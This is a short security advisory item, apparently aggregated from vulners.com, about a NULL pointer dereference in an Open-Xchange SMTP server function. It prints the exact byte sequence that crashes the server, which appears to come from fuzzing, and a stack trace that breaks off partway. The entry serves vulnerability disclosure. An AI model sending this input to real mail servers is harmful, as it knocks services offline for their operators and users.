๐ Open-Xchange: Null pointer dereference in SMTP server function smtp_command_parse_data_with_size
๐ก Newskategorie: Sicherheitslรผcken
๐ Quelle: vulners.com
Sending the following bytes to the SMTP server induces a NULL pointer dereference 0x20,0x0,0x0,0x1,0xa,0x20,0x0,0xa,0x20,0x39,0x20,0xa,0x8,0x3b,0xa,0x0,0x1,0xa,0x0,0x20,0xa,0x8,0x3b,0xa,0x42,0x46,0x41,0x54,0xa,0x44,0x41,0x54,0x20,0x51,0xa,0xa,0x42,0x44,0x41,0x54,0x20,0x35,0x20,0x42,0x44,0x41,0xa,0xff,0xa,0x20,0xfd,0xc1,0x42,0x20,0xfd,0x20,0xa,0xa,0x20,0x20,0xfd,0xa7,0x41,0x54,0x41,0x49,0x54,0x20,0x20,0xa,0x20,0xde,0x9e,0x9e,0x20,0x20,0xa,0xa,0x20,0xde,0xa,0xee,0xa,0x41,0x54,0x20,0x30,0x20,0xa,0x20,0x41,0x67,0xa,0x4d,0x41,0x49,0x4c,0x8a,0x20,0xa,0x42,0x44,0x41,0x54,0xa,0x42,0x44,0x41,0x54,0x20,0xa,0x52,0x53,0x45,0x54,0xa,0x20,0xbb,0x9c,0x2a,0x9,0x9,0x9,0x9,0x9,0x9,0x9,0x9,0xa,0x9,0x9,0x9,0x9,0x9,0x9,0x9,0xff,0x2d,0x54,0x54,0x2a,0xa, Stack trace is #0 0x10083ef30 in smtp_command_parse_data_with_size smtp-command-parser.c:498 #1 0x100849b2e in smtp_server_cmd_bdat smtp-server-cmd-data.c:660 #2 0x100854a46 in smtp_server_command_new smtp-server-command.c:248 #3 0x10086a139 in smtp_server_connection_handle_command smtp-server-connection.c:299 #4 0x1008693e3 in smtp_server_connection_handle_input smtp-server-connection.c:434 #5 0x100868d4a in smtp_server_connection_input smtp-server-connection.c:583 #6 0x1008f278b in io_loop_call_io ioloop.c:713 #7 0x1008f3970 in io_loop_call_pending ioloop.c:751 #8 0x1008f3449 in io_loop_handler_run ioloop.c:766 #9 0x1008f30cd in io_loop_run ioloop.c:738 #10 0x1007ebdc1 in LLVMFuzzerTestOneInput... ...